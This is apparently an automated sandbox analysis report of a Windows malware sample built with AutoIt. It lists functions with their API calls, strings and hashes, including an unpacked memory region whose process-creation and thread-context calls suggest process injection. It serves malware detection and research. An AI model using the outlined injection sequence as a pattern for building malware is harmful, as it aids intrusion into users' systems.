Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01BD9E00: Sleep.KERNELBASE(000001F4), ref: 01BD9E11

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01BDA020

Strings

M4NLJFGES9SP8O, xrefs: 01BDA083, 01BDA086

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateFileSleep
String ID: M4NLJFGES9SP8O
API String ID: 2694422964-2526028916
Opcode ID: ceabd3b8de5e9cd426fbe5ce41f2d6600ac48888a31f88df4f826b9a9a696a20
Instruction ID: fe2815a8614d47e1ec1626a2137633a29671292851eb578ee8f1f428bb53604d
Opcode Fuzzy Hash: ceabd3b8de5e9cd426fbe5ce41f2d6600ac48888a31f88df4f826b9a9a696a20
Instruction Fuzzy Hash: A3515331D04249DBEF19DBB4C854BEEBB79AF59300F004599E208BB2C0E7795B49CBA5

Function 00F9407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FCD3D7

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

_memset.LIBCMT ref: 00F940FC
_wcscpy.LIBCMT ref: 00F94150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F94160

Strings

Line: , xrefs: 00FCD400

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: a30f0c5eff0cda7d654ac84d140543d4fdd63f17d01312464e2cb7b69fe96b96
Instruction ID: e94945a4e4e8dec754885950e9b9b08e0a51cf328d8cc26254e1b8b31d7afe16
Opcode Fuzzy Hash: a30f0c5eff0cda7d654ac84d140543d4fdd63f17d01312464e2cb7b69fe96b96
Instruction Fuzzy Hash: 6A31F171408301AFEB72EB60DC46FDB77E8AF94314F10491EF5C592091EB78A649DB86

Function 00F9686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F94DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E0F

_free.LIBCMT ref: 00FCE263
_free.LIBCMT ref: 00FCE2AA

Part of subcall function 00F96A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F96BAD

Strings

Bad directive syntax error, xrefs: 00FCE292
>>>AUTOIT SCRIPT<<<, xrefs: 00FCE039

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: e7a4ac15088a247ac55dd2162650cf4df51d2fecf0ac30056861cf643121b240
Instruction ID: da3c6c3169a2bdfe0e24a4f0c2d719162983f19cef683765af0dbc6c57682fe4
Opcode Fuzzy Hash: e7a4ac15088a247ac55dd2162650cf4df51d2fecf0ac30056861cf643121b240
Instruction Fuzzy Hash: 9F917F71D1421AAFDF04EFA4CC82AEDB7B4FF14310B14442EF815AB2A1DB78A915EB50

Function 00F935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F935A1,SwapMouseButtons,00000004,?), ref: 00F935D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F935A1,SwapMouseButtons,00000004,?,?,?,?,00F92754), ref: 00F935F5
RegCloseKey.KERNELBASE(00000000,?,?,00F935A1,SwapMouseButtons,00000004,?,?,?,?,00F92754), ref: 00F93617

Strings

Control Panel\Mouse, xrefs: 00F935D2

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 948a8f1f7ed899bc5172cd81e95f5a3c35f8f8a9f57f8b7a57ff7ab292d7e5e4
Instruction ID: a616b7d14dea52aa66eb175a01fd702a99dae6a909f8b43c19398f6d2f2ad6d5
Opcode Fuzzy Hash: 948a8f1f7ed899bc5172cd81e95f5a3c35f8f8a9f57f8b7a57ff7ab292d7e5e4
Instruction Fuzzy Hash: 57115A71910208BFEF21CFA8D844EAFBBB8EF04750F004459F805D7200D2719F44A760

Function 01BD8E00 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01BD95BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BD9651
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BD9673

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
Instruction ID: ad127e51ccbdbd686eecc9478c9527c0e5f761a1113b67350843cd71a459d9fa
Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
Instruction Fuzzy Hash: 44621F30A14258DBEB28CFA4C850BDEB775EF58304F1091A9D10DEB394E77A9E81CB59

Function 00FF955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00F94EE5: _fseek.LIBCMT ref: 00F94EFD

Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9824
Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9837

_free.LIBCMT ref: 00FF96A2
_free.LIBCMT ref: 00FF96A9
_free.LIBCMT ref: 00FF9714

Part of subcall function 00FB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9A24), ref: 00FB2D69
Part of subcall function 00FB2D55: GetLastError.KERNEL32(00000000,?,00FB9A24), ref: 00FB2D7B

_free.LIBCMT ref: 00FF971C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 04be443e3469fe980d2bb4e06cf99893a8860a54e3f092c4316823fa730f047b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 0A516DB1D04218AFDF249F65CC81BAEBBB9EF48300F1004AEF609A3251DB755A81DF58

Function 00FB470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FB47A0
__flush.LIBCMT ref: 00FB47C0
__write.LIBCMT ref: 00FB47F3
__flsbuf.LIBCMT ref: 00FB4821

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7a5180d1d07a99f8f3cd533284b0a497c19de56af684d83b400d185ebdcf0d48
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 2C41E535E007469BDB18CE6BCA809EE77A5EF46360B20813DE815C7642DB34ED41EF40

Function 00F97285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FCEA39
GetOpenFileNameW.COMDLG32(?), ref: 00FCEA83

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FB0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB07B0

Strings

X, xrefs: 00FCEA51

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 94aee356411d6474eedf32d4ba6344a76e517dce86cc5e5d5191e4ed8b6c7a63
Instruction ID: 5bd7c04296f2f3bdb81f15a90f45a44941d9252b0d2becd18e6a249b4593d015
Opcode Fuzzy Hash: 94aee356411d6474eedf32d4ba6344a76e517dce86cc5e5d5191e4ed8b6c7a63
Instruction Fuzzy Hash: 6B21A171A103489BDF51AFD4CC45BEE7BF8AF49314F00801AE448A7241DBB85989AFA1

Function 00FF98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00FF98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FF990F

Strings

aut, xrefs: 00FF9909

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: abc480bcfc0653734e4116c1073d376ec099269e2a12cca4bfc7e46e7f124f85
Instruction ID: 1159e0b9ac6e846b99e3780720623a401ecf6ed9b952a69c6c64a13d61af94e8
Opcode Fuzzy Hash: abc480bcfc0653734e4116c1073d376ec099269e2a12cca4bfc7e46e7f124f85
Instruction Fuzzy Hash: 8DD05E7954030EABDB609AA0EC4EFDA777CE704700F0046A1FA9496091EAB995988B91

Function 0100CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0289b4ca4eacc4bfb579d56106e943fbca1c80a6849dff8d58e698bf7b133b05
Instruction ID: 4632962c36cadbf5977ce977757a591fedaf20f5a422c9613bc87550c91e93cb
Opcode Fuzzy Hash: 0289b4ca4eacc4bfb579d56106e943fbca1c80a6849dff8d58e698bf7b133b05
Instruction Fuzzy Hash: 83F16C706083059FEB15DF28C980A6ABBE5FF88314F14895EF8999B391D734E945CF82

Function 00F9F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB0193
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB019B
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB01A6
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB01B1
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB01B9
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB01C1

Part of subcall function 00FA60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F9F930), ref: 00FA6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F9F9CD
OleInitialize.OLE32(00000000), ref: 00F9FA4A
CloseHandle.KERNEL32(00000000), ref: 00FD45C8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 08647eae140e444cf2946d872038eb3d5b4c249f0f4a0ec1edf429b6a99f4a7c
Instruction ID: 27ee375ee42b3468337c664538f76cab12629ff52d090167e41611c01c4bfd19
Opcode Fuzzy Hash: 08647eae140e444cf2946d872038eb3d5b4c249f0f4a0ec1edf429b6a99f4a7c
Instruction Fuzzy Hash: FF81CDB0A11744CFC7A4EF29EC4562B7FE5FB8830AB50812AD489CB25AEB7E5404CF11

Function 00F9434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F94370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F94415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F94432

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 0ae1dcbbfb80d0705846006829ca87d683ca6d9d51ea12152151c360251b4ed2
Instruction ID: d891b20c10d2e8bef2a625a7b7d7ab96e66ef48df33cd5f59cd4b5443b9d2f70
Opcode Fuzzy Hash: 0ae1dcbbfb80d0705846006829ca87d683ca6d9d51ea12152151c360251b4ed2
Instruction Fuzzy Hash: 073181709047019FEB31DF34D884A9BBBF8FB59318F00092EF6DA82241D775A945DB52

Function 00FB571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00FB5733

Part of subcall function 00FBA16B: __NMSG_WRITE.LIBCMT ref: 00FBA192
Part of subcall function 00FBA16B: __NMSG_WRITE.LIBCMT ref: 00FBA19C

__NMSG_WRITE.LIBCMT ref: 00FB573A

Part of subcall function 00FBA1C8: GetModuleFileNameW.KERNEL32(00000000,010533BA,00000104,?,00000001,00000000), ref: 00FBA25A
Part of subcall function 00FBA1C8: ___crtMessageBoxW.LIBCMT ref: 00FBA308

Part of subcall function 00FB309F: ___crtCorExitProcess.LIBCMT ref: 00FB30A5
Part of subcall function 00FB309F: ExitProcess.KERNEL32 ref: 00FB30AE

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

RtlAllocateHeap.NTDLL(01B20000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bb4a472b2dbc180b5e038051683934c6dbd8bb9d767e100a294467e864b51d48
Instruction ID: ecbf28fb3e25fd922761901568be7866bf2201ab5298ed16cd124a30ac710ebf
Opcode Fuzzy Hash: bb4a472b2dbc180b5e038051683934c6dbd8bb9d767e100a294467e864b51d48
Instruction Fuzzy Hash: 5F01D635740B0ADAD7103A7BEC42BEE77889B82BB1F200525F5059A181DE7D8801BF60

Function 00FF98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FF9548,?,?,?,?,?,00000004), ref: 00FF98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FF9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FF98D1
CloseHandle.KERNEL32(00000000,?,00FF9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF98D8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 50ef976ee2de616d5d275d31c65966be25bb40a3f01be302bade492d73ebc48e
Instruction ID: 31b9c9463c66e37a6cb373946c0159d2ebda18a67984cf9f009c8d3992661684
Opcode Fuzzy Hash: 50ef976ee2de616d5d275d31c65966be25bb40a3f01be302bade492d73ebc48e
Instruction Fuzzy Hash: 2EE08632180619B7D7311A94EC09FDA7B19AB06770F108210FB54690E0C7BA15159798

Function 00FF8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FF8D1B

Part of subcall function 00FB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9A24), ref: 00FB2D69
Part of subcall function 00FB2D55: GetLastError.KERNEL32(00000000,?,00FB9A24), ref: 00FB2D7B

_free.LIBCMT ref: 00FF8D2C
_free.LIBCMT ref: 00FF8D3E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: afe4f02ecc32b845c377da47348d9996064709689d2a9572e4ffe6a1bf5cd3bc
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: A8E012A1A1160546CB64A579AD40AEB63DC4F5C3A2714091DB90DD7196CE68F843A524

Function 00F9A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00FCFC01

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 177822dd9a9ade66b449d858fb6fab4f81b4cc098a247d40adc0914a1d9ba677
Instruction ID: c3680b3f8c4e683385e6975458650e9d61ae176208d44f4a02ec4daefea16cfe
Opcode Fuzzy Hash: 177822dd9a9ade66b449d858fb6fab4f81b4cc098a247d40adc0914a1d9ba677
Instruction Fuzzy Hash: 6D226871908301CFEB24DF14C490B6ABBE1BF85314F19895DE89A8B361DB35EC45EB82

Function 00F94C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F94CBA

Strings

EA06, xrefs: 00FCD8CC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: bafe04a8f244e11ebab1e79096d98783c98c1da3da23627e87497d043817424b
Instruction ID: 9dfc3d122bfdfc876b7b2c0be161e84b31b2c3ecdb3bd0e47f7f83dac428105f
Opcode Fuzzy Hash: bafe04a8f244e11ebab1e79096d98783c98c1da3da23627e87497d043817424b
Instruction Fuzzy Hash: E8419C36E041585BFF269B548C51FBF7BA29F25310F284476EC82DB282D624BD46B3A1

Function 00F97A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F97AAB
_memmove.LIBCMT ref: 00F97B16

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

